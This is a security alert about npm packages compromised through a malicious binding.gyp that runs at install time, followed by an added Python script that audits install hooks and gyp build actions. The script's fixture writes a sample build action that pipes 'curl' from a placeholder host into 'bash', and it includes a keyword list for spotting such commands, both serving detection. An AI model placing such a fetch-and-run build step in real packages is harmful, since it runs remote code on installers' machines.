SlowMist issues npm supply chain attack alert: 23 packages affected, stolen credentials found in 408 GitHub repositories
The SlowMist security team has issued an alert: a variant of the Shai-Hulud/Miasa/Hades npm malware is spreading through the npm ecosystem and is linked to the compromised npm developer account czirker. The attack uses a crafted binding.gyp file, the build description that node-gyp evaluates, to execute malicious code while npm install runs. So far 23 affected packages have been confirmed, among them Leo logger with about 3,140 weekly downloads, and 408 GitHub repositories containing stolen credentials have been detected.
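The install-time execution path described above can be audited in an installed dependency tree. The script below is an added example written for this page; it is neither SlowMist's tooling nor code from the malware. It parses every binding.gyp with Python's ast.literal_eval (GYP files are Python dict literals, which is why Python is used here rather than JavaScript), lists any `actions` entries that run commands during `node-gyp rebuild`, reports the package.json lifecycle hooks that fire on install, and records that a binding.gyp with no explicit install script still makes npm run `node-gyp rebuild`. The packages it builds for demonstration (clean-addon, bad-addon, the example.invalid URL) are constructed fixtures, not the packages named in the alert, and the SUSPICIOUS_TOKENS list is a heuristic assumption.

```python
"""Audit an npm dependency tree for code that runs at install time.

Added example, not SlowMist's tooling and not the malware. binding.gyp is
a Python dict literal that node-gyp evaluates, so ast.literal_eval parses it
directly; an 'actions' entry in it runs arbitrary commands during
`node-gyp rebuild`, which npm invokes on install.
"""
import ast
import json
import os
import tempfile

# Lifecycle hooks npm runs while installing a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Heuristic (assumed) tokens that do not belong in a native-addon build step.
SUSPICIOUS_TOKENS = ("curl", "wget", "bash", "sh -c", "powershell", "node -e", "base64", "bun")


def parse_gyp(text):
    """binding.gyp is usually a Python dict literal; some packages write plain JSON."""
    try:
        return json.loads(text)
    except ValueError:
        return ast.literal_eval(text)


def gyp_actions(gyp):
    """Return (target_name, action_name, command) for every action in a parsed GYP dict."""
    out = []
    if not isinstance(gyp, dict):
        return out
    for target in gyp.get("targets", []):
        for action in target.get("actions", []):
            cmd = " ".join(str(part) for part in action.get("action", []))
            out.append((target.get("target_name", "?"), action.get("action_name", "?"), cmd))
    return out


def is_suspicious(command):
    lowered = command.lower()
    return any(tok in lowered for tok in SUSPICIOUS_TOKENS)


def audit_package(pkg_dir):
    """Findings for one package as (kind, label, command, suspicious) tuples."""
    findings, scripts = [], {}
    pj = os.path.join(pkg_dir, "package.json")
    if os.path.isfile(pj):
        with open(pj, encoding="utf-8") as fh:
            scripts = json.load(fh).get("scripts") or {}
    for hook in INSTALL_HOOKS:
        if hook in scripts:
            findings.append(("lifecycle", hook, scripts[hook], is_suspicious(scripts[hook])))
    gyp_path = os.path.join(pkg_dir, "binding.gyp")
    if os.path.isfile(gyp_path):
        # npm defaults the install step to `node-gyp rebuild` when binding.gyp exists
        # and no install/preinstall script is declared, so the file alone is an execution path.
        if "install" not in scripts and "preinstall" not in scripts:
            findings.append(("implicit", "node-gyp rebuild", "binding.gyp present", False))
        with open(gyp_path, encoding="utf-8") as fh:
            try:
                gyp = parse_gyp(fh.read())
            except (ValueError, SyntaxError):
                gyp = {}
                findings.append(("gyp", "unparseable", gyp_path, True))
        for target, name, cmd in gyp_actions(gyp):
            findings.append(("gyp-action", f"{target}/{name}", cmd, is_suspicious(cmd)))
    return findings


def audit_tree(node_modules):
    """Map package path -> findings for every package.json under node_modules (nested included)."""
    report = {}
    for root, _dirs, files in os.walk(node_modules):
        if "package.json" in files:
            name = os.path.relpath(root, node_modules).replace(os.sep, "/")
            findings = audit_package(root)
            if findings:
                report[name] = findings
    return report


def build_fixture():
    """Write a constructed sample tree (not real packages) and return its node_modules path."""
    nm = os.path.join(tempfile.mkdtemp(), "node_modules")
    clean = os.path.join(nm, "clean-addon")  # ordinary native addon, no actions
    os.makedirs(clean)
    with open(os.path.join(clean, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "clean-addon", "version": "1.0.0"}, fh)
    with open(os.path.join(clean, "binding.gyp"), "w", encoding="utf-8") as fh:
        fh.write("{\n  'targets': [{'target_name': 'addon', 'sources': ['addon.cc']}],\n}\n")
    bad = os.path.join(nm, "bad-addon")  # build file whose action fetches and runs a script
    os.makedirs(bad)
    with open(os.path.join(bad, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "bad-addon", "version": "1.0.0",
                   "scripts": {"postinstall": "node setup.js"}}, fh)
    with open(os.path.join(bad, "binding.gyp"), "w", encoding="utf-8") as fh:
        fh.write("{\n  'targets': [{\n    'target_name': 'addon',\n    'sources': ['addon.cc'],\n"
                 "    'actions': [{\n      'action_name': 'prebuild',\n      'inputs': [], 'outputs': ['x'],\n"
                 "      'action': ['sh', '-c', 'curl -s http://example.invalid/s | bash'],\n    }],\n  }],\n}\n")
    return nm


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_fixture()
    for pkg, found in sorted(audit_tree(target).items()):
        for kind, label, cmd, bad in found:
            print(f"{'!!' if bad else '  '} {pkg}: {kind} {label}: {cmd}")
```

Point it at a real tree with `python audit_npm_install_hooks.py ./node_modules`; with no argument it audits the constructed fixture. Every package that declares an install hook or ships a binding.gyp is listed, and lines marked `!!` are the ones whose command matches the heuristic token list. Setting `ignore-scripts=true` in .npmrc stops npm from running lifecycle scripts, including the implicit `node-gyp rebuild`, at the cost of breaking native addons that genuinely need compilation, so the audit is the step that tells you which packages to allow through.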